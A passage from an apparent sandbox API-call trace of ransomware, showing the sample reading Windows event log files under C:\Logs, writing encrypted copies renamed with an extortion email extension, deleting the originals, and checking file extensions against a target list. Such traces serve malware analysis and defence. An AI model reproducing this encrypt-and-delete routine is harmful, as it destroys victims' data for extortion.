DLL.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0061.281] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0061.281] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.281] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.281] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0061.282] GetLastError () returned 0x0 [0061.282] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x11000, lpOverlapped=0x0) returned 1 [0061.285] WriteFile (in: hFile=0x380, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x11010, lpOverlapped=0x0) returned 1 [0061.287] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0061.287] WriteFile (in: hFile=0x380, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x12e, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x12e, lpOverlapped=0x0) returned 1 [0061.287] SetEndOfFile (hFile=0x380) returned 1 [0061.287] CloseHandle (hObject=0x380) returned 1 [0061.289] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.289] SetEndOfFile (hFile=0x2c8) returned 1 [0061.290] CloseHandle (hObject=0x2c8) returned 1 [0061.290] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0061.290] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx")) returned 1 [0061.290] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0061.290] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0061.290] lstrlenW (lpString=".doc") returned 4 [0061.290] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0061.290] lstrlenW (lpString=".docx") returned 5 [0061.291] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0061.291] lstrlenW (lpString=".pdf") returned 4 [0061.291] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0061.291] lstrlenW (lpString=".xls") returned 4 [0061.291] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0061.291] lstrlenW (lpString=".xlsx") returned 5 [0061.291] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0061.291] lstrlenW (lpString=".ppt") returned 4 [0061.291] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0061.291] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0061.291] lstrlenW (lpString=".zip") returned 4 [0061.291] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0061.291] lstrlenW (lpString=".rar") returned 4 [0061.291] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0061.291] lstrlenW (lpString=".bz2") returned 4 [0061.291] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0061.291] lstrlenW (lpString=".7z") returned 3 [0061.291] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0061.291] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0061.291] lstrlenW (lpString=".dbf") returned 4 [0061.291] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0061.291] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0061.291] lstrlenW (lpString=".1cd") returned 4 [0061.291] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0061.291] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0061.291] lstrlenW (lpString=".jpg") returned 4 [0061.291] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0061.291] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0061.291] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0061.291] lstrlenW (lpString=".doc") returned 4 [0061.291] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0061.291] lstrlenW (lpString=".docx") returned 5 [0061.291] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0061.291] lstrlenW (lpString=".pdf") returned 4 [0061.292] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0061.292] lstrlenW (lpString=".xls") returned 4 [0061.292] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0061.292] lstrlenW (lpString=".xlsx") returned 5 [0061.292] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0061.292] lstrlenW (lpString=".ppt") returned 4 [0061.292] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0061.292] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0061.292] lstrlenW (lpString=".zip") returned 4 [0061.292] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0061.292] lstrlenW (lpString=".rar") returned 4 [0061.292] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0061.292] lstrlenW (lpString=".bz2") returned 4 [0061.292] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0061.292] lstrlenW (lpString=".7z") returned 3 [0061.292] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0061.292] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0061.292] lstrlenW (lpString=".dbf") returned 4 [0061.292] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0061.292] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0061.292] lstrlenW (lpString=".1cd") returned 4 [0061.292] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0061.292] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0061.292] lstrlenW (lpString=".jpg") returned 4 [0061.292] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0061.292] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0061.292] lstrlenW (lpString="Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 48 [0061.292] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0061.293] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=69632) returned 1 [0061.293] CloseHandle (hObject=0x2c8) returned 1 [0061.293] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx")) returned 0x20 [0061.293] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0061.293] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0061.293] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.293] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.293] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0061.293] GetLastError () returned 0x0 [0061.293] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x11000, lpOverlapped=0x0) returned 1 [0061.296] WriteFile (in: hFile=0x380, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x11010, lpOverlapped=0x0) returned 1 [0061.297] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0061.297] WriteFile (in: hFile=0x380, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x134, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x134, lpOverlapped=0x0) returned 1 [0061.297] SetEndOfFile (hFile=0x380) returned 1 [0061.297] CloseHandle (hObject=0x380) returned 1 [0061.299] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.299] SetEndOfFile (hFile=0x2c8) returned 1 [0061.300] CloseHandle (hObject=0x2c8) returned 1 [0061.300] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0061.300] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx")) returned 1 [0061.301] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0061.301] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0061.301] lstrlenW (lpString=".doc") returned 4 [0061.301] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0061.301] lstrlenW (lpString=".docx") returned 5 [0061.301] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0061.301] lstrlenW (lpString=".pdf") returned 4 [0061.301] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0061.301] lstrlenW (lpString=".xls") returned 4 [0061.301] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0061.301] lstrlenW (lpString=".xlsx") returned 5 [0061.301] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0061.301] lstrlenW (lpString=".ppt") returned 4 [0061.301] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0061.301] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0061.301] lstrlenW (lpString=".zip") returned 4 [0061.301] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0061.301] lstrlenW (lpString=".rar") returned 4 [0061.301] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0061.301] lstrlenW (lpString=".bz2") returned 4 [0061.301] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0061.301] lstrlenW (lpString=".7z") returned 3 [0061.301] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0061.301] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0061.301] lstrlenW (lpString=".dbf") returned 4 [0061.302] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0061.302] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0061.302] lstrlenW (lpString=".1cd") returned 4 [0061.302] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0061.302] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0061.302] lstrlenW (lpString=".jpg") returned 4 [0061.302] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0061.302] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0061.302] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0061.302] lstrlenW (lpString=".doc") returned 4 [0061.302] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0061.302] lstrlenW (lpString=".docx") returned 5 [0061.302] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0061.302] lstrlenW (lpString=".pdf") returned 4 [0061.302] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0061.302] lstrlenW (lpString=".xls") returned 4 [0061.302] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0061.302] lstrlenW (lpString=".xlsx") returned 5 [0061.302] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0061.302] lstrlenW (lpString=".ppt") returned 4 [0061.302] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0061.302] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0061.302] lstrlenW (lpString=".zip") returned 4 [0061.302] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0061.302] lstrlenW (lpString=".rar") returned 4 [0061.302] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0061.302] lstrlenW (lpString=".bz2") returned 4 [0061.302] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0061.302] lstrlenW (lpString=".7z") returned 3 [0061.302] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0061.302] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0061.302] lstrlenW (lpString=".dbf") returned 4 [0061.302] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0061.303] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0061.303] lstrlenW (lpString=".1cd") returned 4 [0061.303] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0061.303] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0061.303] lstrlenW (lpString=".jpg") returned 4 [0061.303] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0061.303] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0061.303] lstrlenW (lpString="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 57 [0061.303] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0061.303] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=69632) returned 1 [0061.303] CloseHandle (hObject=0x2c8) returned 1 [0061.303] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx")) returned 0x20 [0061.303] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0061.303] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0061.304] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.304] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.304] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0061.304] GetLastError () returned 0x0 [0061.304] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x11000, lpOverlapped=0x0) returned 1 [0061.895] WriteFile (in: hFile=0x380, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x11010, lpOverlapped=0x0) returned 1 [0062.019] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0062.019] WriteFile (in: hFile=0x380, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x146, lpOverlapped=0x0) returned 1 [0062.019] SetEndOfFile (hFile=0x380) returned 1 [0062.019] CloseHandle (hObject=0x380) returned 1 [0062.027] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.077] SetEndOfFile (hFile=0x2c8) returned 1 [0062.078] CloseHandle (hObject=0x2c8) returned 1 [0062.079] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0062.079] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx")) returned 1 [0062.840] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 65 [0062.840] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 65 [0062.840] lstrlenW (lpString=".doc") returned 4 [0062.840] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0062.840] lstrlenW (lpString=".docx") returned 5 [0062.840] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0062.840] lstrlenW (lpString=".pdf") returned 4 [0062.840] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0062.840] lstrlenW (lpString=".xls") returned 4 [0062.840] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0062.840] lstrlenW (lpString=".xlsx") returned 5 [0062.840] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0062.840] lstrlenW (lpString=".ppt") returned 4 [0062.840] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0062.840] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 65 [0062.840] lstrlenW (lpString=".zip") returned 4 [0062.840] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0062.840] lstrlenW (lpString=".rar") returned 4 [0062.840] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0062.840] lstrlenW (lpString=".bz2") returned 4 [0062.841] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0062.841] lstrlenW (lpString=".7z") returned 3 [0062.841] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0062.841] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 65 [0062.841] lstrlenW (lpString=".dbf") returned 4 [0062.841] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0062.841] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 65 [0062.841] lstrlenW (lpString=".1cd") returned 4 [0062.841] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0062.841] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 65 [0062.841] lstrlenW (lpString=".jpg") returned 4 [0062.841] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0062.841] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 65 [0062.841] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 65 [0062.841] lstrlenW (lpString=".doc") returned 4 [0062.841] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0062.841] lstrlenW (lpString=".docx") returned 5 [0062.841] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0062.841] lstrlenW (lpString=".pdf") returned 4 [0062.841] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0062.841] lstrlenW (lpString=".xls") returned 4 [0062.841] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0062.841] lstrlenW (lpString=".xlsx") returned 5 [0062.841] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0062.841] lstrlenW (lpString=".ppt") returned 4 [0062.841] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0062.841] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 65 [0062.841] lstrlenW (lpString=".zip") returned 4 [0062.841] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0062.842] lstrlenW (lpString=".rar") returned 4 [0062.842] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0062.842] lstrlenW (lpString=".bz2") returned 4 [0062.842] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0062.842] lstrlenW (lpString=".7z") returned 3 [0062.842] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0062.842] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 65 [0062.842] lstrlenW (lpString=".dbf") returned 4 [0062.842] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0062.842] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 65 [0062.842] lstrlenW (lpString=".1cd") returned 4 [0062.842] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0062.842] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 65 [0062.842] lstrlenW (lpString=".jpg") returned 4 [0062.842] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0062.842] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0062.842] lstrlenW (lpString="Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 50 [0062.842] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0063.003] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=69632) returned 1 [0063.003] CloseHandle (hObject=0x380) returned 1 [0063.003] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx")) returned 0x20 [0063.003] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0063.003] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0063.003] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.003] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.003] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0063.003] GetLastError () returned 0x0 [0063.003] ReadFile (in: hFile=0x380, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x11000, 